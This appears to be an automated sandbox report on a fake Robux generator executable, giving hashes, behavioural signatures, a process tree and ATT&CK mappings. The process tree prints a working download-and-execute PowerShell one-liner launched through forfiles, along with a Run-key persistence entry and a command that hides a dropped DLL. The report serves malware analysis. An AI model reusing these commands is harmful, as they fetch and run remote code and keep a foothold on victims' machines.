Analysis

max time kernel: 208s
max time network: 196s
platform: windows10-2004_x64
resource: win10v2004-20240802-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
submitted: 05/08/2024, 17:08

Static task: static1
Behavioral task: behavioral1
Sample: robuxgeneratorapp.exe
Resource: win10v2004-20240802-en
General

Target: robuxgeneratorapp.exe
Size: 7.0MB
MD5: cd7f96aa5c48273581e22aaabfc7167e
SHA1: 2e350a557878c59a93a1abf13b7bf2307fa21a78
SHA256: acdf56cd54e954f2a876520fbb1ac715a56176a5aa0815bfa19713d8f535043b
SHA512: ede9a99cd87485a0235c15afee1e63e0ecfb4c62c9a84e3cf5fe6cbe721877838c1135c0c9401432d6725b8f9ba35b7e6b41fa75d51baf96d825bc05ee654e87
SSDEEP: 98304:ksa9wrXfr7GposZExhblaYQ91V/BbH6bGw0EukKou1+P:ha0fr7Gr6xip1VZtw0EHKFU
Malware Config
Signatures
Blocklisted process makes network request (3 IoCs)
flow | pid | Process
37 | 2816 | powershell.exe
38 | 2816 | powershell.exe
49 | 2816 | powershell.exe
Sets file to hidden (1 TTPs, 1 IoCs)
Modifies file attributes to stop it showing in Explorer etc.
pid | Process
1228 | attrib.exe
Indirect Command Execution (1 TTPs, 2 IoCs)
Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.
pid | Process
3308 | powershell.exe
3584 | forfiles.exe
Adds Run key to start application (2 TTPs, 1 IoCs)
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive File Sync = "odbcconf.exe /a {REGSVR OneDriveFileSync}" | powershell.exe
Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 5 IoCs)
flow | ioc
1 | raw.githubusercontent.com
2 | raw.githubusercontent.com
38 | raw.githubusercontent.com
48 | discord.com
49 | discord.com
Checks SCSI registry key(s) (3 TTPs, 6 IoCs)
SCSI information is often read in order to detect sandboxing environments.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | taskmgr.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | taskmgr.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | taskmgr.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | taskmgr.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | taskmgr.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | taskmgr.exe
Enumerates system info in registry (2 TTPs, 3 IoCs)
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe
Modifies registry class (1 IoCs)
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings | taskmgr.exe
Opens file in notepad (likely ransom note) (1 IoCs)
pid | Process
3096 | NOTEPAD.EXE
Suspicious behavior: EnumeratesProcesses (64 IoCs)
Suspicious behavior: GetForegroundWindowSpam (1 IoCs)
pid | Process
408 | taskmgr.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary (2 IoCs)
pid | Process
864 | msedge.exe
864 | msedge.exe
Suspicious use of AdjustPrivilegeToken (21 IoCs)
description | pid | Process
Token: SeDebugPrivilege | 3764 | taskmgr.exe
Token: SeSystemProfilePrivilege | 3764 | taskmgr.exe
Token: SeCreateGlobalPrivilege | 3764 | taskmgr.exe
Token: 33 | 3764 | taskmgr.exe
Token: SeIncBasePriorityPrivilege | 3764 | taskmgr.exe
Token: SeDebugPrivilege | 408 | taskmgr.exe
Token: SeSystemProfilePrivilege | 408 | taskmgr.exe
Token: SeCreateGlobalPrivilege | 408 | taskmgr.exe
Token: SeDebugPrivilege | 3308 | powershell.exe
Token: SeDebugPrivilege | 2816 | powershell.exe
Token: SeSecurityPrivilege | 408 | taskmgr.exe
Token: SeTakeOwnershipPrivilege | 408 | taskmgr.exe
Token: SeSecurityPrivilege | 408 | taskmgr.exe
Token: SeTakeOwnershipPrivilege | 408 | taskmgr.exe
Token: SeBackupPrivilege | 4296 | svchost.exe
Token: SeRestorePrivilege | 4296 | svchost.exe
Token: SeSecurityPrivilege | 4296 | svchost.exe
Token: SeTakeOwnershipPrivilege | 4296 | svchost.exe
Token: 35 | 4296 | svchost.exe
Token: 33 | 408 | taskmgr.exe
Token: SeIncBasePriorityPrivilege | 408 | taskmgr.exe
Suspicious use of FindShellTrayWindow (64 IoCs)
Suspicious use of SendNotifyMessage (64 IoCs)
Suspicious use of WriteProcessMemory (64 IoCs)
Views/modifies file attributes (1 TTPs, 1 IoCs)
pid | Process
1228 | attrib.exe
Processes

(Indentation shows the process tree depth reported by the sandbox.)

C:\Users\Admin\AppData\Local\Temp\robuxgeneratorapp.exe (depth 1, PID 4656)
Command line: "C:\Users\Admin\AppData\Local\Temp\robuxgeneratorapp.exe"
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 2, PID 3308)
  Command line: "powershell.exe" forfiles.exe /p c:\windows\system32 /m notepad.exe /c 'powershell.exe -command sal notpad iex; sal windows_nt iwr; iex(iwr tinyurl.com/2jcsd7db -usebasicparsing)'
  - Indirect Command Execution
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory

    C:\Windows\system32\forfiles.exe (depth 3, PID 3584)
    Command line: "C:\Windows\system32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command sal notpad iex; sal windows_nt iwr; iex(iwr tinyurl.com/2jcsd7db -usebasicparsing)"
    - Indirect Command Execution
    - Suspicious use of WriteProcessMemory

      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 4, PID 2816)
      Command line: -command sal notpad iex; sal windows_nt iwr; iex(iwr tinyurl.com/2jcsd7db -usebasicparsing)
      - Blocklisted process makes network request
      - Adds Run key to start application
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe (depth 5, PID 752)
        Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gro4oitd\gro4oitd.cmdline"
        - Suspicious use of WriteProcessMemory

          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe (depth 6, PID 4660)
          Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES65F8.tmp" "c:\Users\Admin\AppData\Local\Temp\gro4oitd\CSCC8B9B9615ECB4A51B8145BA91E255E0.TMP"

        C:\Windows\system32\attrib.exe (depth 5, PID 1228)
        Command line: "C:\Windows\system32\attrib.exe" +s +h C:\Users\Admin\AppData\Local\Temp\OneDriveFileSync.dll
        - Sets file to hidden
        - Views/modifies file attributes

C:\Windows\system32\taskmgr.exe (depth 1, PID 3764)
Command line: "C:\Windows\system32\taskmgr.exe" /4
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage

C:\Windows\system32\taskmgr.exe (depth 1, PID 408)
Command line: "C:\Windows\system32\taskmgr.exe" /4
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage

C:\Windows\system32\svchost.exe (depth 1, PID 4296)
Command line: C:\Windows\system32\svchost.exe -k SDRSVC
- Suspicious use of AdjustPrivilegeToken

C:\Windows\System32\rundll32.exe (depth 1, PID 5116)
Command line: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 1, PID 864)
Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\jawshtml.html
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of WriteProcessMemory

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2, PID 2872)
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff874fb46f8,0x7ff874fb4708,0x7ff874fb4718

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2, PID 4272)
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1912,6845089720473406439,14119195799417614956,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2020 /prefetch:2

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2, PID 3896)
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1912,6845089720473406439,14119195799417614956,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2340 /prefetch:3

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2, PID 3500)
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1912,6845089720473406439,14119195799417614956,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2652 /prefetch:8

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2, PID 1460)
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,6845089720473406439,14119195799417614956,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2, PID 3716)
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,6845089720473406439,14119195799417614956,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3376 /prefetch:1

  C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe (depth 2, PID 5076)
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1912,6845089720473406439,14119195799417614956,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5092 /prefetch:8

  C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe (depth 2, PID 1188)
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1912,6845089720473406439,14119195799417614956,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5092 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe (depth 1, PID 4720)
Command line: C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe (depth 1, PID 180)
Command line: C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\system32\NOTEPAD.EXE (depth 1, PID 3096)
Command line: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\jusched.log
- Opens file in notepad (likely ransom note)
Network
MITRE ATT&CK Enterprise v15

Privilege Escalation
  Boot or Logon Autostart Execution (1)
    Registry Run Keys / Startup Folder (1)
Defense Evasion
  Hide Artifacts (2)
    Hidden Files and Directories (2)
  Indirect Command Execution (1)
  Modify Registry (1)
Downloads